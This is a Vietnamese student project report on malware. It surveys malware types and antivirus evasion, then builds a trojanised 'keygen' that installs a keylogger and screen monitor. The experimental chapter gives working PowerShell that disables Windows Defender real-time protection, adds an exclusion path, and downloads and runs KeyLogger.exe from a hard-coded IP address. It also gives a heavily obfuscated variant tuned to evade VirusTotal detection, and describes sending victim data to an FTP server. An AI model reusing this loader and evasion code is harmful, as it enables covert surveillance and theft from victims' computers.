1. Trang chủ
  2. » Công Nghệ Thông Tin

NGHIÊN CỨU VÀ PHÁT TRIỂN THỬ NGHIỆM MÃ ĐỘC

38 17 0

Đang tải... (xem toàn văn)

Tài liệu hạn chế xem trước, để xem đầy đủ mời bạn chọn Tải xuống

THÔNG TIN TÀI LIỆU

Cấu trúc

  • LỜI CAM ĐOAN

  • LỜI CÁM ƠN

  • TÓM TẮT

  • CHƯƠNG 1. TỔNG QUAN VỀ MÃ ĐỘC

    • 1.1. Mã độc là gì

    • 1.2. Phân loại

    • 1.3. Mục đích và tầm nguy hiểm của mã độc

    • 1.4. Quy ước đặt tên cho mã độc

  • CHƯƠNG 2. CƠ CHẾ HOẠT ĐỘNG CỦA MÃ ĐỘC

    • 2.1. Cơ chế hoạt động của mã độc

    • 2.2. Các phương pháp lây lan của mã độc

  • CHƯƠNG 3. MỘT SỐ KỸ THUẬT VƯỢT MẶT ANTIVIRUS

    • 3.1. Phần mềm Antivirus hoạt động như thế nào?

    • 3.2. Tin tặc đã vượt mặc Antivirus như thế nào?

    • 3.3. Kỹ thuật Obfuscation

    • 3.4. Kỹ thuật Encryption

  • CHƯƠNG 4. TRIỂN KHAI THỰC NGHIỆM MÃ ĐỘC

    • 4.1. Triển khai kỹ thuật vượt mặc Antivirus

    • 4.2. Triển khai mã độc

  • CHƯƠNG 5. KẾT LUẬN

    • 5.1. Đánh giá đề tài

      • 5.1.1. Những công việc đã làm được

      • 5.1.2. Những hạn chế của trong đề tài

    • 5.2. Hướng phát triển của đề tài

  • Tài liệu tham khảo

Nội dung

BỘ CÔNG THƯƠNG TRƯỜNG ĐẠI HỌC CÔNG NGHIỆP THỰC PHẨM TP.HCM KHOA CÔNG NGHỆ THÔNG TIN BÁO CÁO ĐỒ ÁN NGHIÊN CỨU VÀ PHÁT TRIỂN THỬ NGHIỆM MÃ ĐỘC Giảng viên hướng dẫn: Ths Trần Đắc Tốt Sinh viên thực hiện: Đỗ Minh Long – 2033181041 Nguyễn Hoàng Nam - 2033181047 TP.Hồ Chí Minh,ngày 12 tháng 10 năm 2021 BỘ CÔNG THƯƠNG TRƯỜNG ĐẠI HỌC CÔNG NGHIỆP THỰC PHẨM TP.HCM KHOA CÔNG NGHỆ THÔNG TIN BÁO CÁO ĐỒ ÁN NGHIÊN CỨU VÀ PHÁT TRIỂN THỬ NGHIỆM MÃ ĐỘC Giảng viên hướng dẫn: Ths Trần Đắc Tốt Sinh viên thực hiện: Đỗ Minh Long - 2033181041 Nguyễn Hồng Nam - 2033181047 TP.Hồ Chí Minh,ngày 12 tháng 10 năm 2021 LỜI CAM ĐOAN Tôi xin cam đoan cơng trình nghiên cứu riêng tơi Các số liệu, kết nêu Đồ án trung thực chưa công bố cơng trình khác Tơi xin cam đoan giúp đỡ cho việc thực Đồ án cảm ơn thơng tin trích dẫn Đồ án rõ nguồn gốc Sinh viên thực Đồ án Sinh viên thực Đồ án (Ký ghi rõ họ tên) (Ký ghi rõ họ tên) Nguyễn Hoàng Nam Đỗ Minh Long Trang LỜI CÁM ƠN Trước tiên, chúng em xin gửi lời cảm ơn biết ơn sâu sắc đến Thầy Trần Đắc Tốt, Giảng viên hướng dẫn chúng em thực đề tài Thầy tận tình bảo, giúp đỡ nhóm suốt thời gian thực người giúp nhóm đưa ý tưởng, kiểm tra phù hợp đề tài Nhóm xin gửi lời cảm ơn đến toàn thể thầy cô trường ĐH Công Nghiệp Thực Phẩm TP.HCM giảng dạy tạo điều kiện cho em trình học tập phát triển trường Mặc dù cố gắng hoàn thành đề tài phạm vi khả Tuy nhiên khơng thể tránh khỏi thiếu sót Em mong nhận cảm thơng tận tình bảo qúy thầy tồn thể bạn Xin chân thành cảm ơn! Trang TÓM TẮT Ngày nay, việc phát triển nhanh chóng, vượt bậc ngành cơng nghệ thơng tin nói riêng mạng internet nói chung chạm đến ngóc ngách đời sống xã hội, dần trở thành phận quan trọng quốc gia Nhưng đặt thách thức to lớn vấn đề đảm bảo an toàn an ninh thơng tin vơ to lớn Nó khơng gây nguy đe dọa nghiêm trọng đến lĩnh vực kinh tế, mà gây mối đe dọa lĩnh vực an ninh quốc phòng, an ninh quốc gia Hình thức cơng có chủ đích APT sử dụng mã độc tàng hình thực bùng phát năm 2020 Cụ thể, theo thống kê từ hệ thống Bkav, 800.000 máy tính Việt Nam bị nhiễm loại mã độc năm 2020, tăng gấp đôi so với năm 2019 Mã độc tàng hình Fileless loại mã độc đặc biệt, khơng có file nhị phân ổ cứng máy tính loại mã độc thơng thường Nhận thấy tinh vi mức độ nguy hiểm mã độc nên mục đích đồ án nhằm nghiên cứu loại mã độc cách thức mà chúng hoạt động hệ thống chúng vượt mặt hệ thống Antivirus Đồng thời, thiết kế xây dựng thử nghiệm mã độc với chức năng: monitor hình, theo dõi chuột, bàn phím kỹ thuật vượt mặt hệ thống Antivirus Trang NHẬN XÉT CỦA GIÁO VIÊN HƯỚNG DẪN Nhóm sinh viên gồm : Đỗ Minh Long MSSV: 2033181041 Nguyễn Hoàng Nam MSSV: 2033181047 Nhận xét : Ngày ……….tháng ………….năm 2021 ( ký tên, ghi rõ họ tên) Trang NHẬN XÉT CỦA GIÁO VIÊN PHẢN BIỆN Nhóm sinh viên gồm : Đỗ Minh Long MSSV: 2033181041 Nguyễn Hoàng Nam MSSV: 2033181047 Nhận xét : Ngày ……….tháng ………….năm 2021 ( ký tên, ghi rõ họ tên) Trang MỤC LỤC LỜI CAM ĐOAN i LỜI CÁM ƠN ii TÓM TẮT .iii CHƯƠNG TỔNG QUAN VỀ MÃ ĐỘC 1.1 Mã độc 1.2 Phân loại 1.3 Mục đích tầm nguy hiểm mã độc .6 1.4 Quy ước đặt tên cho mã độc CHƯƠNG CƠ CHẾ HOẠT ĐỘNG CỦA MÃ ĐỘC .8 2.1 Cơ chế hoạt động mã độc .8 2.2 Các phương phát lây lan mã độc CHƯƠNG MỘT SỐ KỸ THUẬT VƯỢT MẶT ANTIVIRUS 12 3.1 Phần mềm Antivirus hoạt động nào? 12 3.2 Tin tặc vượt mặc Antivirus nào? 13 3.3 Kỹ thuật Obfuscation 13 3.4 Kỹ thuật Encryption 16 CHƯƠNG TRIỂN KHAI THỰC NGHIỆM MÃ ĐỘC .18 4.1 Triển khai kỹ thuật vượt mặc Antivirus 18 4.2 Triển khai mã độc 23 CHƯƠNG KẾT LUẬN 26 5.1 Đánh giá đề tài .26 5.1.1 Những công việc làm 26 5.1.2 Những hạn chế đề tài 26 5.2 Hướng phát triển đề tài 26 Tài liệu tham khảo .27 Trang DANH SÁCH HÌNH ẢNH Hình Mã độc Hình Virus wanacry .3 Hình Mục đích cơng mã độc Hình Quy ước đặt tên cho mã độc .7 Hình Đính kèm mã độc email Hình Quy trình lây nhiễm mã độc qua email Hình Phát tán mã độc link độc hại thông qua sms brandname 10 Hình Phát tán mã độc thơng qua thiết bị USB 11 Hình Một số phần mềm Antivirus thông dụng 12 Hình 10 Giao diện phần mềm chứa mã độc 18 Hình 11 Kết Virus Total kiểm tra trước có mã độc đính kèm 18 Hình 12 Thơng tin metadata phần mềm chứa mã độc 19 Hình 13 Thơng tin metadata phần mềm độc hại sau chỉnh sửa 19 Hình 14 Kết Virustotal kiểm tra sau thay đổi thôn gtin metadata 19 Hình 15 Mã độc đính kèm phần mềm 20 Hình 16.Mã độc lưu server 20 Hình 17 Kết Virustotal kiểm tra sau thêm mã độc vào phần mềm 20 Hình 18 Mã độc đính kèm phần mềm dùng kỹ thuật Obfuscation 22 Hình 19 Kết Virustotal thực kỹ thuật Obfuscation 22 Hình 20: Mã độc ẩn giấu máy nạn nhân .23 Hình 21: FTP chứa liệu giám sát máy tính nạn nhân .23 Hình 22: Ứng dụng điều khiển mã độc 24 Hình 23: Các cấu hình cho mã độc .24 Hình 24: Theo dõi hình mục tiêu 25 Hình 25: Theo dõi hệ thống tập tin mục tiêu 25 Trang BÁO CÁO ĐỒ ÁN NGHIÊN CỨU VÀ PHÁT TRIỂN THỬ NGHIỆM MÃ ĐỘC CHƯƠNG TỔNG QUAN VỀ MÃ ĐỘC 1.1 Mã độc Mã độc (malware – malicious software) chương trình máy tính, phần mềm tạo với mục đích phá hoại máy tính mạng máy tính, phần mềm độc hại Các chương trình máy tính làm nhiều chức khác tùy thuộc vào đặc tính loại kế tới ăn cắp, mã hóa, chỉnh sửa liệu, thay đổi chiếm đoạt quyền giảm sát hoạt động máy tính nhiễm phải chúng mà chưa có cho phép người sở hữu máy tính Ngày loại mã độc trở nên phức tạp chúng phát triển theo thời gian từ cách thức lây nhiễm, cách thức ẩn hệ thống cách thức chúng thực để gây hại cho mục tiêu, Giới hạn mặt chức ngày gia tăng lên mà mã độc ngày có nhiều chức nhiều loại mã độc khác nhau, nâng cao hiệu công gây thiệt hại phần mềm độc hại Với phát triển ngày tăng loại mã độc từ thúc đẩy nâng cao phát triển vượt bậc công nghệ bảo mật nhằm chống lại mã độc, tạo công nghệ đột phá tương lai Hình Mã độc Mã độc gây thiệt hại sau mà chúng vượt qua tất giải pháp bảo mật liên quan đến ngăn chặn, phát mã độc cấy thành cơng máy tính nạn nhân Sau chúng thị phần mềm riêng biệt máy nạn nhân mà nạn nhân khơng biết thực thi máy Vì mã độc khơng bao gồm đoạn mã gây nên lỗi phần mềm thông thường – lỗi vô ý thiếu sót người lập trình viên gây ra, lỗi bị kẻ xấu lợi dụng để chiếm quyền, điều khiển,… máy nạn nhân Trang BÁO CÁO ĐỒ ÁN NGHIÊN CỨU VÀ PHÁT TRIỂN THỬ NGHIỆM MÃ ĐỘC Với mã máy tính, người đọc người, thiết bị tính tốn chương trình khác Obfuscation sử dụng để đánh lừa công cụ Antivirus chương trình khác dựa nhiều vào chữ ký số để diễn giải mã Trình biên dịch có sẵn cho ngôn ngữ Java, hệ điều hành Android iOS, tảng phát triển NET Họ tự động đảo ngược mã nguồn; obfuscation nhằm mục đích gây khó khăn cho chương trình việc dịch ngược chúng Obfuscation thay đổi nội dung mã gốc chương trình, mà làm cho phương thức phân phối cách trình bày mã trở nên khó hiểu Obfuscation khơng thay đổi cách chương trình hoạt động kết đầu Sau đoạn mã ví dụ mã JavaScript bình thường: var greeting = 'Hello World'; greeting = 10; var product = greeting * greeting; Đoạn mã tương tự dạng xáo trộn trông này: var _0x154f=['98303fgKsLC','9koptJz','1LFqeWV','13XCjYtB','6990QlzuJn','8 7260lXoUxl','2HvrLBZ','15619aDPIAh','1kfyliT','80232AOCrXj','2jZAgw Y','182593oBiMFy','1lNvUId','131791JfrpUY'];var _0x52df=function(_0x159d61,_0x12b953){_0x159d61=_0x159d610x122;var _0x154f4b=_0x154f[_0x159d61];return _0x154f4b;}; (function(_0x19e682,_0x2b7215){var _0x5e377c=_0x52df;while(!![]) {try{var _0x2d3a87=parseInt(_0x5e377c(0x129))*parseInt(_0x5e377c(0x123))+parseInt(_0x5e377c(0x125))*parseInt(_0x5e377c(0x12e)) +parseInt(_0x5e377c(0x127))*-parseInt(_0x5e377c(0x126))+parseInt(_0x5e377c(0x124))*-parseInt(_0x5e377c(0x12f))+parseInt(_0x5e377c(0x128))*-parseInt(_0x5e377c(0x12b)) +parseInt(_0x5e377c(0x12a))*parseInt(_0x5e377c(0x12d)) +parseInt(_0x5e377c(0x12c))*parseInt(_0x5e377c(0x122));if(_0x2d3a87= ==_0x2b7215)break;else _0x19e682['push'](_0x19e682['shift'] ());}catch(_0x22c179){_0x19e682['push'](_0x19e682['shift']());}}} (_0x154f,0x1918c));var greeting='Hello\x20World';greeting=0xa;var product=greeting*greeting; Trang 15 BÁO CÁO ĐỒ ÁN NGHIÊN CỨU VÀ PHÁT TRIỂN THỬ NGHIỆM MÃ ĐỘC Dưới số kỹ thuật Obfuscation phổ biến  Renaming: Trình obfuscator thay đổi phương thức tên biến Các tên bao gồm ký tự khơng in khơng nhìn thấy  Packing: iều nén toàn chương trình để làm cho mã khơng thể đọc  Control flow: Kiểm sốt dịng chảy Mã dịch ngược tạo để trơng giống logic spaghetti, khơng có cấu trúc khó trì mã dịng suy nghĩ bị che khuất Kết từ mã không rõ ràng thật khó để biết điểm mã cách nhìn vào  Instruction pattern transformation: Cách tiếp cận lấy hướng dẫn phổ biến trình biên dịch tạo hốn đổi chúng để lấy hướng dẫn phức tạp hơn, phổ biến để thực hiệu điều tương tự  Dummy code insertion: Mã giả thêm vào chương trình để làm cho khó đọc thiết kế ngược, khơng ảnh hưởng đến logic kết chương trình  Metadata or unused code removal: siêu liệu loại bỏ mã không sử dụng Mã siêu liệu không sử dụng cung cấp cho người đọc thêm thông tin chương trình, giống thích tài liệu Word, giúp họ đọc gỡ lỗi chương trình Việc xóa siêu liệu mã khơng sử dụng khiến người đọc có thơng tin chương trình mã  Opaque predicate insertion: Chèn vị ngữ đục Vị từ mã biểu thức logic sai Các vị từ đục nhánh có điều kiện - câu lệnh if-then - kết khơng thể dễ dàng xác định phân tích thống kê Việc chèn vị từ không rõ ràng giới thiệu mã không cần thiết không thực thi gây khó hiểu cho người đọc cố gắng hiểu đầu dịch ngược  Anti-debug: Chống gỡ lỗi Các kỹ sư phần mềm tin tặc hợp pháp sử dụng công cụ gỡ lỗi để kiểm tra dòng mã Với Trang 16 BÁO CÁO ĐỒ ÁN NGHIÊN CỨU VÀ PHÁT TRIỂN THỬ NGHIỆM MÃ ĐỘC cơng cụ này, kỹ sư phần mềm phát vấn đề với mã tin tặc sử dụng chúng để thiết kế ngược mã Các chuyên gia bảo mật CNTT sử dụng công cụ chống gỡ lỗi để xác định tin tặc chạy chương trình gỡ lỗi phần công Tin tặc chạy cơng cụ chống gỡ lỗi để xác định công cụ gỡ lỗi sử dụng để xác định thay đổi mà chúng thực mã  Anti-tamper: Chống làm giả Các công cụ phát mã bị giả mạo sửa đổi, dừng chương trình  String encryption: Mã hóa chuỗi Phương pháp sử dụng mã hóa để ẩn chuỗi tệp thực thi khôi phục giá trị chúng cần thiết để chạy chương trình Điều gây khó khăn cho việc duyệt qua chương trình tìm kiếm chuỗi cụ thể  Code transposition: Đây xếp lại quy trình nhánh mã mà khơng có ảnh hưởng rõ ràng đến hành vi 3.4 Kỹ thuật Encryption Phương pháp thứ Encryption Encryption phương pháp loại bỏ hiệu khả chống lại phần mềm Antivirus phát phần mềm độc hại thông qua Signature Thông thường kẻ công hay tác giả phần mềm độc hại sử dụng Crypter (chương trình mã hóa) để mã hóa tải trọng độc hại họ Các Crypter mã hóa tệp tin đính kèm ‘Stub’, có chương trình Decrypter giải mã nội dung sau thực thi chúng Một cách tiếp cận vượt qua AV dựa chữ ký sử dụng Encryption.Theo cách tiếp cận này, phần mềm độc hại mã hóa thường bao gồm giải mã phần trọng tải mã hóa Bộ giải mã khơi phục phần trọng tải bị mã hóa file bị nhiễm thực thi Đối với lần lây nhiễm, cách sử dụng khóa khác nhau, phần mềm độc hại làm cho phần mã hóa trở thành nhất, ẩn chữ ký Tuy nhiên, vấn đề phương pháp giải mã không đổi từ hệ sang hệ khác Điều giúp AV phát loại phần mềm độc hại dựa mẫu giải mã có sẵn int main( void ) { Trang 17 BÁO CÁO ĐỒ ÁN NGHIÊN CỨU VÀ PHÁT TRIỂN THỬ NGHIỆM MÃ ĐỘC decryptCodeSection(); // Decrypt the code startShellCode(); // Call the shellcode in decrypted code return 0; } Có loại chương trình Crypter:  Scantime: chương trình đơn giản đơn giản giải mã payload, sau đưa xuống ổ đĩa để thực thi  Runtime: chương trình dùng kỹ thuật để injection process khác để giải mã đoạn payload độc hại thực thi memory – RAM mà không cần đụng chạm đến đĩa cứng Một phương pháp Injection process phổ biến sử dụng chương trình thời gian chạy “Process Hollowing” Đầu tiên tạo tiến trình trạng thái bị treo cách sử dụng tệp thực thi hoàn toàn hợp pháp explorer.exe Sau đó, “làm rỗng” process cách giải phóng nhớ process hợp pháp thay payload độc hại trước tiếp tục tiến trình Trang 18 BÁO CÁO ĐỒ ÁN NGHIÊN CỨU VÀ PHÁT TRIỂN THỬ NGHIỆM MÃ ĐỘC CHƯƠNG TRIỂN KHAI THỰC NGHIỆM MÃ ĐỘC 4.1 Triển khai kỹ thuật vượt mặc Antivirus Ý tưởng ban đầu để đánh lừa người dùng thực thi đoạn mã độc ẩn chương trình, tạm gọi chương trình keygen Giao diện chương trình có dạng sau: Hình 10 Giao diện phần mềm chứa mã độc Chức phần mềm lấy quyền Adminstrator từ người dùng, sau thực thi mã độc đính kèm theo chương trình Trước thực kỹ thuật bypass Antivirus, nhóm kiểm tra xem phần mềm có bị phần mềm Antivirus phát hay không? Để kiểm tra nhóm sử dụng trang web https://www.virustotal.com/gui/ - cơng cụ kiểm tra online miễn phí, tham gia nhiều phần mềm Antivirus khác Trang 19 BÁO CÁO ĐỒ ÁN NGHIÊN CỨU VÀ PHÁT TRIỂN THỬ NGHIỆM MÃ ĐỘC Hình 11 Kết Virus Total kiểm tra trước có mã độc đính kèm Mặc dù phần mềm chưa đính kèm mã độc Virustotal cho kết 15/68 phần mềm Antivirus phát chương trình độc hại Có thể Antivirus phát nhầm khơng? Khơng – phần mềm chưa đính kèm mã độc nên phần mềm Antivirus hoạt động theo chế Heuristic không phát phần mềm độc hại Nhưng cịn chế Signature, tìm kiếm thơng tin chuỗi liệu chương trình, thơng tin liên quan đến metadata Hình 12 Thơng tin metadata phần mềm chứa mã độc Dựa vào thông tin metadata ta dễ dàng nhận định mà phần mềm độc hại Các phần mềm Antivirus hoạt động theo chế Signature Để xác định lại có phải thông tin mà phần mềm Antivirus trang Virustotal đưa kết không, nhóm thay đổi thơng tin metadata kiểm tra lại lần trang Virustotal Hình 13 Thông tin metadata phần mềm độc hại sau chỉnh sửa Trang 20 BÁO CÁO ĐỒ ÁN NGHIÊN CỨU VÀ PHÁT TRIỂN THỬ NGHIỆM MÃ ĐỘC Hình 14 Kết Virustotal kiểm tra sau thay đổi thôn gtin metadata Nhằm làm khó cho người phân tích mã độc họ dịch ngược phần mềm độc hại tìm thay đổi hệ thống, nhóm định khơng lưu mã độc chương trình Thay vào đó, mã độc đính kèm phần mềm có nhiệm vụ tải phần mềm độc hại Keylogger.exe lưu server, đoạn mã độc tải thực thi memory iex((New-Object System.Net.WebClient).DownloaString(\"http://103.69.193.23/Document.doc")) Hình 15 Mã độc đính kèm phần mềm ("{4}{3}{1}{2}{0}"-f'Preference','t-M','p','e','S')-DisableRealtimeMonitoring $ {T`RuE}&("{1}{0}{2}{3}"-f't-Mp','Se','Prefer','ence')-ExclusionPath ("$env:APPDATA\Active"+'W'+'indow'+'s')(&("{0}{1}{2}"-f'New-O','bje','ct') ("{0}{1}{4}{3}{2}"-f'Sys','t','ent','ebCli','em.Net.W')).("{2}{0}{3}{1}"-f 'wnloa','File','Do','d').Invoke(("{8}{3}{2}{5}{4}{6}{0}{7}{1}"f'gger.e','e','0','1','9','3.6','.193.23/KeyLo','x','http://'),("$env:APPDATA\Active"+ ('Windows'+'hAdActiv'+'e'+'.'+'e'+'xe').("{0}{1}"-f'rEplAc','e').Invoke('hAd','\'))) ("{2}{0}{1}{3}"-f'rt','-','Sta','Process') (("$env:APPDATA\Active"+ (('Window'+'s3Q'+'l'+'Acti'+'ve.exe')-replACe '3Ql',[ChAr]92))) Hình 16.Mã độc lưu server Sau thêm đoạn mã độc vào phần mềm vào kiểm tra lại với trang Virustotal có kết sau: Trang 21 BÁO CÁO ĐỒ ÁN NGHIÊN CỨU VÀ PHÁT TRIỂN THỬ NGHIỆM MÃ ĐỘC Hình 17 Kết Virustotal kiểm tra sau thêm mã độc vào phần mềm Từ kết ta thấy rõ phần mềm Antivirtus thông dụng phát phần mềm độc hại Ngun nhân từ đoạn mã độc vừa thêm vào Để làm cho kết từ trang Virustotal cho kết thấp có thể, nhóm sử dụng kỹ thuật Obfuscation đề cập trước để bypass chương trình Antivirus Sau thực kỹ thuật Obfuscation , quan sát lại đoạn mã độc kết sau thực quét trang virustotal lần cuối (-jOIN [System.Text.RegularExpressions.Regex]::MatChES(\" ) ) 93]RAHC[,)18]RAHC[+65]RAHC[+011]RAHC[(ecaLpErC - 43]RAHC[, 'sna' ecaLpErC 421]RAHC[,)76]RAHC[+67]RAHC[+301]RAHC[(ecaLpErC -)')Q8' + 'nQ8nnIOJ-]2,11,3[eMan.)Q8n*rDM*Q8n Vg(( CLg )63]rAHC[,)47]' + 'rAHC[+75]rAHC[+79]rAHC[( eCAlpERC- 93]rAHC[,Q8ntvmQ8n eCaLPEr-421]rAHC[,)18]' + 'rAHC[+87]rAHC[+101]rAHC[(eCAlpE' + 'RC- ))Q8n1 , 3Q8n,Q8n, 361, 361,501,Q8n,Q8n , 7' + '4, 35 , 531, 36,16, 331,401 ,151, 451 ,411,541 ,011,361 ,44,35, 531,16 ,33tvm+t' + 'vm1,tvm+t' + 'vm 441,Q8n,Q8n1 ,461 , 46, 741,76 , 30Q8n,Q8n1,17,461 , 111,051, 511 ,441, 76, tvm+tvm311, 411, 561 ,201 ,601 , 021, 051, 171 ,36 , 16,451 ,tvm+tvm 661,601 ,741 ,35, 751, 611 , 011, 171 ,16, 411 ,16 , 111 , 161 , ' + '751 , ' + '26,Q' + '8' + 'n,Q8n 15,04 , 1' + '5 , 04,361 ,321 , 541,261 ,061 ,551 , 711 ,341 ,541 , 441 ,27 ,27 , 531 , 541Q8n,Q8n' + '1,541, 211, 241 ,751, 5' + '5 , 721, 541,611 , 05 ,05,221,tvm+tv' + 'm541, 441 ,141' + ' ,' + '501,261, tQ8n,Q8n51 , 55, 721,541,611 ,05,04, 15, 74 ,0t' + 'vm+tvm71Q8n,Q8ndILlEhSJ9a+]1[dilLehsJ9a (.' + ' QNe )63]RaHc[]GNIRTs[,tvmskrtvm(ECalPeR.)93]RaHc[]GNIRTs[,)08]RaHc[' + '+05]RaQ8n,Q8n,17, 501 , 16 ,301 tvm+tvm,30' + '1 , Q8n,Q8n, 65 ,751 , 151 ,04,04 , 421 ,34Q' + '8n,Q8n2M+' + ']3,1[)EQ8n,Q8n171 , 75 ,101 , 151, 16, 36 ,711 ' + ',35 , 141, Q8' + 'n,Q8n01, 121,tvm+tvm tvm+tvQ8n,Q8n311, 46,4Q8n,Q8n1, 331, 04,05,511, 101 , 541,261 , 461 ,' + '361, 541, 421, 101 ,411,' + '64tQ8n,Q8n1tvm+tvm, 4' + '11,501,011 ,361 , 44 , 04, 05, 04 ,65,04(( niOj-tv' + 'm( Q8n,Q8n 141,66tvm+tvm1 , 051, 56Q8n,Q8n, 251,16, 701,171,141,411,401 ,' + ' 051 , 271 , 761, 46 , 171Q8n,Q8nT::]tReVNoc[ ( { %ZdG)15 ,05, 441,611 ' + ', 501 , 711, 461,' + ' 441 ' + ', Trang 22 BÁO CÁO ĐỒ ÁN NGHIÊN CỨU VÀ PHÁT TRIỂN THỬ NGHIỆM MÃ ĐỘC 141,5tvm+tvm01,261 , 65,' + '15, 04tvm+tvm, 15,151, 15tvm+tvm1 , 30tvm+tvm1,3tvm+tvm61 Q8n,Q8n ,16 ,Q8n,Q8n1 ,301, 16 ,351 ,361 , 66 , 07,7' + '5, 41tvm+tvm1' + ' , 261 , 301,621, 071,301 , 621 , 321 ,101 , 061, 611, 231 , 121,56,141 , 3Q8n,Q8n' + '51 , 421 , 1tvm+tvm6 ,461,16tvm+tvm1Q8n,Q8n, 211' + ',601,tvm+tvQ8n,Q8n , 441 , 751 , 5' + '51' + ',Q8n,' + 'Q' + '8n011 ,711 ,421 ,661 , 341, 521' + ', 06 , 17tvm+tvm, 111,661, 46 ,601 , 071 ,tQ8n,Q8n361, 351 ,071,641 , 301,511 , 75 , 151, 36 ,151 , 401,171 ,031,061 , 151 , 641 ,46 ,' + '321Q8n,Q8nm221 , 021 , 121,tvm+tvm341 , 661 ,151Q8n,Q8n11,151, 661,51' + '1 ,76 , 411,' + ' 17 ,401,26 ' + ',501Q8n,Q8n5 ,711, 151 ,' + '04 ,421, 341 ,541, 211 ,241 , 7Q8' + 'n,Q8n1 ' + 'Q8n,Q8n21 ,4tvm+tvm01 ,' + '561,721, ' + '761,661 , 15Q8n,Q8n301, 65 ,711 , 1Q8n,Q8n271,031 ,35,221, 141, 361 ,141 , tvm+tvm711, 351,tvm+tvmQ8n,Q8' + 'n,451 ,521 ,551 , 101 ,0tvm+tvm61, 441 ,651 ,07 , 131, 451 , 061,341,071,75, 221,5' + '01 ,501tvm+tvm,761, 511,361 ' + ', 421 , 201, 011 ,231 , 031 ,74 ,05 ,701 ,6' + '51 , 151,221 , 461' + ',tvm+tvm tvm+tvm361 ,46 ,66 , 501, 321, 141,201,5tvmQ8n,Q8n)tvm+tvm8, ))(GnIr' + 'tSOt._skr ((61tNIoQ8' + 'n,Q8n1,761 ' + ', 741 ,561 ,741 , 031, 16,17, 221 ,341, 711 , 021,061, 0' + '71tvm+tvm ,151 , 311,231 , 75 , 521, 0Q8n,Q8n, 071 , 501 ,461,tvm+tvm 331 ,04,45,Q8n,Q8n51 ,751 , 341 Q8n,Q8n , 541, Q8n,Q8n, 651tvm+tvm,541 ,' + '65 ,461Q8n,Q8nvm+tvm461 , 221 , 20' + '1, 16 , 56 ,271, 66 , 751 ,021,361 ,661tvm+tv' + 'm,051,07,26Q8n,Q8n,' + '721 ,tvm' + '+tvm321,tvm+tvm 601 , Q8n,Q8n)tQ8n,Q8n+tvm11 , 751 ,261,601 ,27,27 , 531, 42tvm+tvm1,221 ,tv' + 'm+tvm501 ,621,65Q8n,Q8n, 071, 521,201, 651,701 , 541 ,26 , 46 ,031,301,701tvm+tvm, 3' + '5 , Q8' + 'n,Q8nvm+tvm551tvm+tvm ,101, 501 ,261 ,Q8n,Q8n321 , 411,1tvm+tvm7,521 , 011,311 , 121 ,741 , 06 ,461,26,321 , 75,Q8' + 'n,Q8n 221 , 021, 551 ,711, Q8n,Q8n51 , 65 , 551, 501 , 461 , 321tvm+tvm , 1tvm+tvm31,361 , 331,45 , 04,15 , 74 ,031, 751,661 , 421, 411, 26 , 551, 651,141,461 , 511' + ',521 , 651 ,tvm+tvm 451,13t' + 'vm+tvm1 ,321,611, 711 , 171 , 66 , 46,Q8n,Q8n , 421, 321 , 551, 511,46 , 421 ,401 , 75 , 021 , 251 , 421, 341 , 441 , 651 , 17 ,26, 021 ,421, 2' + '6 ,321, 03Q8n,Q8n ,21Q8n,Q8nCneREfERpEs' + 'oBrevskr]gnIRtS[( ' + '( ZdG )} )]RAHC[ Sa-Q8n,Q8n6tvm+tvm, 611Q8n,Q8nvm' + '+tvm1 , 501,441, 65 ,611 , 751, 111,361 ,' + ' 361,5tvm+tvm41 ,221 ,021, 5Q8n,Q8n1, 721 ,011,' + ' 17 ,621, 011, 66, 031 ,71tvm+tvm1 ,741 , 031 , 051, 441 , 101,441Q8n,Q8n, 101,27 , 27 ,531 , 741, 6' + '5Q8n,Q8n, 7tvm+tvm51, 301, 65 , 551 tvm+tvm, 541 ,421 , 361 , 131, 321,331 , 531 ,551 ,101 , 541 , 221,tvm+Q8n,Q8nvmXtvm+]31[Q8n,Q8n761 , Q8n,' + 'Q8n41, 321 ,441, 441 ,01' + '1, 2Q8n,Q8n ' + '461, 321, 6Q8n,Q8n301 ,751Q8n,Q8n321 ,311, 061, 561,711 ,031, 541,511,411, 46, 66 , 661 ,701 , 311,251 , 311, ' + 'Q8n,Q8nHc[+77]RaHc[((ECalPeR.)421]RaHc[]GNIRTs[,)0' + '9]RaHc[+001]RaHc[+17]RaHc[((ECalPeR.)tvm)P2MP2MNIoj-P2MXPQ8n,Q8n 151 , 45Q8n,Q8ntvm+tvm651,711 ,15tvm+tvm1 , 361 ,321Q8n,Q8n , 321 ,301 , Q8n,Q8n1Q8n,Q8ntvm 421,361, 131, 22tvm+tvm1, 751, 511, 541,551, 65 , 711,15Q8n,Q8n1, 151,441,711, 3tvm+tvm01Q8n,Q8n261,061,' + ' 551,711 , 301 ' + ', 65 , ' + '611 , 751 , 111Q8n,Q8n171 ,26 , 07 ,071 ,' + ' Q8n,Q8nm231 ,761' + ',161 ,tvm+tvm 031,1' + '0Q8n,Q8n111, ' + '4tvm+tvm6,441,251Q8nfsna}13{}61{}66{}01{}36{}22{}93{}55{}81{}4{}43{}73{}96{}05{}8{}53{}3{}3 7{}62{}24{}52{}11{}51{}94{}33{}7{}72{}21{}92{}06{}64{}45{}2{}14{}75{}1 7{}07{}26{}84{}56{}0{}65{}32{}47{}41{}25{}23{}6{}' + '34{}91{}15{}1{}8' + '3{}12{}42{' + '}35{}16{}74{}04{}03{}44{}71{}5{}95{}02{}63{}46{}86{}82{}31{}54{}76{}27 {}9{}85{sna(((\'((()\'x\' +]31[dIllehS$+]1[DiLLEhs$ ( \" ,'.',\'rIGHttOlEFT\'))| ( $pshOME[21]+$pShome[30]+\'x\') Hình 18 Mã độc đính kèm phần mềm dùng kỹ thuật Obfuscation Trang 23 BÁO CÁO ĐỒ ÁN NGHIÊN CỨU VÀ PHÁT TRIỂN THỬ NGHIỆM MÃ ĐỘC Hình 19 Kết Virustotal thực kỹ thuật Obfuscation 4.2 Triển khai mã độc Sau tiêm thành công đoạn mã độc vào hệ thống vượt qua Antivirus, đoạn mã độc thực, thi từ giám sát máy nạn nhân Mã độc ẩn khiến người dùng khó phát Hình 20: Mã độc ẩn giấu máy nạn nhân Khi mã độc thực thi có chứng giống “keylogger”, mà giám sát chuột bàn phím hình nạn Trang 24 BÁO CÁO ĐỒ ÁN NGHIÊN CỨU VÀ PHÁT TRIỂN THỬ NGHIỆM MÃ ĐỘC nhân Sau gửi liệu qua FTP server lưu theo cấu trúc thư mục định Hình 21: FTP chứa liệu giám sát máy tính nạn nhân Ngồi cịn tiến hành kết nối tới ứng dụng thông qua môi trường mạng, ứng dụng dùng để điều khiển mã độc Cấu hình cho mã độc hoạt động theo dõi hoạt động mã độc Giám sát mã độc 